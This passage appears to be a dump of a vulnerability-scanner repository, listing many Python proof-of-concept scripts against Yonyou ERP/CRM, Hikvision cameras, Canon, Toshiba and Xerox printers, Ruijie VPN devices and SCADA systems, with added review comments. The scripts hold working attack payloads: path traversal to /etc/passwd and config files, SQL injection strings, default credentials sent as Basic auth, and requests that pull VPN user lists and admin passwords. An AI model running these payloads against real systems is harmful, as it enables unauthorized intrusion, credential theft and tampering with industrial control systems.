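        """Request the probe URL and print a low-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
        vulnurl = self.url + payload
        try:
            # requests follows redirects by default, so req.text is the body of
            # wherever the chain ended. verify=False skips certificate
            # validation; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): a page that merely prints the host name matches
            # too; inspecting the Location header would be a stricter test.
            if r"www.baidu.com" in req.text:
                cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = wordpress_url_redirect_BaseVerify(sys.argv[1])
    testVuln.run()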
--------------------------------------------------------------------------------
/pocs/cms/xplus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/xplus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/yonyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/yonyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_ehr_ELTextFile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友EHR 任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-066512
6 | author: Lucifer
7 | description: 文件/hrss/ELTextFile.load.d中,参数src存在任意文件读取漏洞,可获取敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
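class yonyou_ehr_ELTextFile_BaseVerify:
    """Check a Yonyou EHR host for the ``ELTextFile.load.d`` file read.

    Sends one GET whose ``src`` parameter points at ``ierp/bin/prop.xml`` and
    judges the result by Content-Type plus a body marker.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() instead of indexing: a response without a Content-Type
            # header used to raise KeyError and be reported as a timeout.
            # NOTE(review): the body marker is empty in this copy (presumably
            # an angle-bracketed tag lost in extraction; restore it from the
            # upstream file). `"" in text` is always true, so the header
            # decides alone and any XML reply is reported.
            if req.headers.get("Content-Type") == "application/xml" and r"" in req.text:
                cprint("[+]存在用友EHR 任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = yonyou_ehr_ELTextFile_BaseVerify(sys.argv[1])
    testVuln.run()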
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_getemaildata_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友CRM系统任意文件读取
5 | referer: http://wooyun.org/bugs/wooyun-2015-0137503
6 | author: Lucifer
7 | description: 文件/ajax/getemaildata.php中,参数filePath未过滤存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
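class yonyou_getemaildata_fileread_BaseVerify:
    """Check a Yonyou CRM host for the ``getemaildata.php`` file read.

    Sends one GET whose ``filePath`` parameter points at ``../version.txt``
    and looks for the word ``patch`` in a 200 response.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): "patch" is a common word, so a custom 200 error
            # page can match; treat a hit as a lead.
            if req.status_code == 200 and r"patch" in req.text:
                cprint("[+]存在用友CRM系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = yonyou_getemaildata_fileread_BaseVerify(sys.argv[1])
    testVuln.run()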
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_nc_NCFindWeb_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友nc NCFindWeb 任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0148227
6 | author: Lucifer
7 | description: 文件NCFindWeb参数filename存在任意文件读取漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
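class yonyou_nc_NCFindWeb_fileread_BaseVerify:
    """Check a Yonyou NC host for the ``NCFindWeb`` arbitrary file read.

    Sends one GET whose ``filename`` parameter points at ``/etc/passwd`` and
    looks for ``root:`` and ``/bin/bash`` in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The markers only fit a Unix-like host whose root shell is bash;
            # other hosts yield no finding either way.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在用友nc NCFindWeb 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = yonyou_nc_NCFindWeb_fileread_BaseVerify(sys.argv[1])
    testVuln.run()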
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_test_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友致远A6 test.jsp SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0155953
6 | author: Lucifer
7 | description: /yyoa/common/js/menu/test.jsp 文件中S1 参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
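class yonyou_test_sqli_BaseVerify:
    """Check a Yonyou/Seeyon A6 host for SQL injection in ``test.jsp``.

    Sends one GET with a fixed ``S1`` value and looks for the MD5 of ``1234``
    in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/yyoa/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"); it appears only if the database
            # evaluated the expression from the query string.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在用友致远A6 test.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = yonyou_test_sqli_BaseVerify(sys.argv[1])
    testVuln.run()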
--------------------------------------------------------------------------------
/pocs/cms/yonyou/yonyou_user_ids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 用友致远A6协同系统SQL注射union可shell
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0106478
6 | author: Lucifer
7 | description: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?参数user_ids存在注入,可GETSHELL。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
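class yonyou_user_ids_sqli_BaseVerify:
    """Check a Yonyou/Seeyon A6 host for SQL injection in ``setextno.jsp``.

    Sends one GET with a fixed ``user_ids`` value and looks for the MD5 of
    ``1234`` in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"); it appears only if the database
            # evaluated the expression from the query string.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在用友致远A6 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = yonyou_user_ids_sqli_BaseVerify(sys.argv[1])
    testVuln.run()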
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/zfsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/cms/zfsoft/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/pocs/cms/zuitu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/zuitu/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/camera/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/camera/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/camera/camera_hikvision_web_weak.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 海康威视web弱口令
5 | referer: http://www.myhack58.com/Article/html/2/5/2014/55637.htm
6 | author: Lucifer
7 | description: 海康威视摄像头web界面存在通用弱口令12345。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class camera_hikvision_web_weak_BaseVerify:
    """Check whether a Hikvision camera web UI still accepts the default login.

    One GET with HTTP Basic credentials is sent to the PSIA user-check path;
    a finding is printed when the response body contains both "200" and "OK".
    A positive result means the device password should be changed.
    """

    def __init__(self, url):
        # Base URL of the device under assessment; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe and print the outcome via cprint; returns None."""
        probe_path = '/PSIA/Custom/SelfExt/userCheck'
        vulnurl = self.url + probe_path
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            # Basic-auth value for the default account named in the finding (admin:12345).
            "Authorization":"Basic YWRtaW46MTIzNDU="
        }
        try:
            # verify=False skips TLS certificate validation, so the answer is
            # not authenticated as coming from the intended device.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            body_markers = (r"200", r"OK")
            if not all(marker in response.text for marker in body_markers):
                return
            # Substring match only: any page containing both markers is reported.
            finding = "".join(("[+]存在康威视web弱口令漏洞...(高危)\tpayload: ", vulnurl, "\tadmin:12345"))
            cprint(finding, "red")

        except:
            # Every failure, not just a timeout, is reported with this message.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
32 |
if __name__ == "__main__":
    # Script entry: the first command-line argument is the base URL to check.
    warnings.filterwarnings("ignore")
    camera_hikvision_web_weak_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/hardware/firewall/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/firewall/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/gateway/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/gateway/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/gateway/adtsec_Overall_app_js_bypass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: SJW74系列安全网关 和 PN-2G安全网关信息泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件stat/Overall_app.jsp中,禁用js可泄露敏感信息。因为页面采用的js加载请求服务,对身份进行了简单的验证 ,可以绕过。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class adtsec_Overall_app_js_bypass_BaseVerify:
    """Check whether stat/Overall_app.jsp is readable without logging in.

    The page is fetched once; a finding is printed when the body contains
    both the highcharts script path and "ExportAppPDFServlet".
    """

    def __init__(self, url):
        # Base URL of the gateway; the page path is appended unchanged.
        self.url = url

    def run(self):
        """Fetch the statistics page and print the outcome via cprint."""
        vulnurl = self.url + "/stat/Overall_app.jsp"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            has_chart_script = r"include/highCharts/js/highcharts.js" in response.text
            if has_chart_script and r"ExportAppPDFServlet" in response.text:
                # Both strings present: the page content was served to an
                # unauthenticated client.
                cprint("".join(("[+]存在SJW74系列安全网关 和 PN-2G安全网关信息泄露漏洞...(低危)\tpayload: ", vulnurl)), "green")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the gateway base URL.
    warnings.filterwarnings("ignore")
    checker = adtsec_Overall_app_js_bypass_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/printer/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_canon_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 佳能打印机未授权漏洞
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-114364
6 | author: Lucifer
7 | description: 佳能打印机未授权可远程打印。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class printer_canon_unauth_BaseVerify:
    """Check whether a Canon printer web UI serves its welcome page.

    A finding is printed when /twelcome.cgi returns a body containing both
    "media/b_ok.gif" and "_top.htm".
    """

    def __init__(self, url):
        # Base URL of the printer; the CGI path is appended unchanged.
        self.url = url

    def run(self):
        """Request the welcome page and print the outcome via cprint."""
        vulnurl = self.url + "/twelcome.cgi"
        request_headers = {
            # NOTE(review): this is the same Basic value the Xerox default-password
            # check in this repository sends; because credentials are attached,
            # a hit here does not by itself show the page is open without auth.
            "Authorization":"Basic MTExMTE6eC1hZG1pbg==",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if all(marker in response.text for marker in (r"media/b_ok.gif", r"_top.htm")):
                cprint("".join(("[+]存在佳能打印机未授权漏洞...(高危)\tpayload: ", vulnurl)), "red")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
32 |
if __name__ == "__main__":
    # Script entry: argv[1] is the printer base URL.
    warnings.filterwarnings("ignore")
    printer_canon_unauth_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_topaccess_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 东芝topaccess打印机未授权漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 8080端口服务web未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class printer_topaccess_unauth_BaseVerify:
    """Check whether a Toshiba TopAccess web UI on port 8080 is open.

    A finding is printed when /TopAccess/default.htm returns a body containing
    both "Device/Device.htm" and "/TopAccess/js/LoadTopMenu.js".
    """

    def __init__(self, url):
        # Base URL of the printer; ":8080" and the page path are appended to it.
        self.url = url

    def run(self):
        """Request the TopAccess start page and print the outcome via cprint."""
        port = 8080
        # The port is appended textually, so a base URL that already carries a
        # port or a path yields a malformed address.
        vulnurl = self.url + ":" + str(port) + "/TopAccess/default.htm"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page_markers = (r"Device/Device.htm", r"/TopAccess/js/LoadTopMenu.js")
            if not all(marker in response.text for marker in page_markers):
                return
            cprint("".join(("[+]存在东芝topaccess打印机未授权漏洞...(高危)\tpayload: ", vulnurl)), "red")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
32 |
if __name__ == "__main__":
    # Script entry: argv[1] is the printer base URL (without a port).
    warnings.filterwarnings("ignore")
    checker = printer_topaccess_unauth_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/hardware/printer/printer_xerox_default_pwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 富士施乐打印机默认口令漏洞
5 | referer: http://www.wooyun.org/bugs/WooYun-2016-196214
6 | author: Lucifer
7 | description: 默认配置不当/可远程查看打印记录并打印文件,可以通过Port9100和FTP服务进行打印。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class printer_xerox_default_pwd_BaseVerify:
    """Check whether a Fuji Xerox printer still accepts its default login.

    /prop.htm is requested with HTTP Basic credentials; a finding is printed
    when the body contains both "prconprhttp" and "Fuji Xerox". A positive
    result means the administrator password should be changed.
    """

    def __init__(self, url):
        # Base URL of the printer; the page path is appended unchanged.
        self.url = url

    def run(self):
        """Request the properties page and print the outcome via cprint."""
        vulnurl = self.url + "/prop.htm"
        request_headers = {
            # Basic-auth value for the default account named in the finding
            # message (11111:x-admin).
            "Authorization":"Basic MTExMTE6eC1hZG1pbg==",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if all(marker in response.text for marker in (r"prconprhttp", r"Fuji Xerox")):
                finding = "".join(("[+]存在富士施乐打印机默认口令漏洞...(高危)\tpayload: ", vulnurl, "\t11111:x-admin"))
                cprint(finding, "red")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
32 |
if __name__ == "__main__":
    # Script entry: argv[1] is the printer base URL.
    warnings.filterwarnings("ignore")
    printer_xerox_default_pwd_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/hardware/router/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/hardware/router/__init__.py
--------------------------------------------------------------------------------
/pocs/hardware/router/router_ruijie_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 锐捷VPN设备未授权访问漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/cgi-bin/authUser/authUserData.cgi中存在未授权漏洞,可下载任意vpn账号密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
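class router_ruijie_unauth_BaseVerify:
    """Check whether a Ruijie VPN device serves its user export without login.

    The export CGI is requested once; a finding is printed when the response
    carries a Content-Disposition header naming "otp_user.csv".
    """

    def __init__(self, url):
        # Base URL of the device; the CGI path is appended unchanged.
        self.url = url

    def run(self):
        """Request the export endpoint and print the outcome via cprint."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/cgi-bin/authUser/authUserData.cgi?type=downloadUsers"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() with a default: a response without the header is simply
            # "not affected" instead of raising KeyError and being misreported
            # as a connection timeout.
            disposition = req.headers.get('Content-Disposition', '')
            if r"filename=otp_user.csv" in disposition:
                cprint("[+]存在锐捷VPN设备未授权访问漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")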
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the device base URL.
    warnings.filterwarnings("ignore")
    checker = router_ruijie_unauth_BaseVerify(sys.argv[1])
    checker.run()
36 |
--------------------------------------------------------------------------------
/pocs/industrial/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/industrial/__init__.py
--------------------------------------------------------------------------------
/pocs/industrial/dfe_scada_conf_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 东方电子SCADA通用系统信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0131500
6 | http://www.wooyun.org/bugs/wooyun-2010-0131719
7 | author: Lucifer
8 | description: 敏感信息泄露,可获取管理员账号和口令。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class dfe_scada_conf_disclosure_BaseVerify:
    """Check whether the SCADA work-mode endpoint discloses configuration.

    A finding is printed when requestWorkMode.php returns a body containing
    both "productName" and "adminPassword".
    """

    def __init__(self, url):
        # Base URL of the system; the endpoint path is appended unchanged.
        self.url = url

    def run(self):
        """Request the endpoint and print the outcome via cprint."""
        vulnurl = self.url + "/modules/manage/server/requestWorkMode.php"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            field_names = (r"productName", r"adminPassword")
            if not all(name in response.text for name in field_names):
                return
            # Only the field names are matched; the response content itself is
            # neither printed nor stored here.
            cprint("".join(("[+]存在东方电子SCADA通用系统信息泄露漏洞...(高危)\tpayload: ", vulnurl)), "red")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
32 |
if __name__ == "__main__":
    # Script entry: argv[1] is the system base URL.
    warnings.filterwarnings("ignore")
    dfe_scada_conf_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/industrial/industrialmain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 工业控制漏洞库
5 | referer: unknow
6 | author: Lucifer
7 | description: 包含所有industrial control漏洞类型,封装成一个模块
8 | '''
9 | #wireless
10 | from industrial.wireless_monitor_priv_elevation import wireless_monitor_priv_elevation_BaseVerify
11 | from industrial.rockontrol_weak import rockontrol_weak_BaseVerify
12 | from industrial.sgc8000_sg8k_sms_disclosure import sgc8000_sg8k_sms_disclosure_BaseVerify
13 | from industrial.zte_wireless_getChannelByCountryCode_sqli import zte_wireless_getChannelByCountryCode_sqli_BaseVerify
14 | from industrial.zte_wireless_weak_pass import zte_wireless_weak_pass_BaseVerify
15 | from industrial.sgc8000_deldata_config_disclosure import sgc8000_deldata_config_disclosure_BaseVerify
16 | from industrial.sgc8000_defaultuser_disclosure import sgc8000_defaultuser_disclosure_BaseVerify
17 | from industrial.dfe_scada_conf_disclosure import dfe_scada_conf_disclosure_BaseVerify
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_defaultuser_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000监控系统超管账号泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 文件defaultuser.xml中,泄露了超级管理员账号和密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
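class sgc8000_defaultuser_disclosure_BaseVerify:
    """Check whether defaultuser.xml of an sgc8000 system is publicly readable.

    A finding is printed when the file is served as "application/xml" and its
    body contains "superadmin".
    """

    def __init__(self, url):
        # Base URL of the system; the file path is appended unchanged.
        self.url = url

    def run(self):
        """Request the XML file and print the outcome via cprint."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/app/sg8k_rs/config/defaultuser.xml"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get(): a response without Content-Type is "not affected" rather
            # than a KeyError misreported as a timeout.
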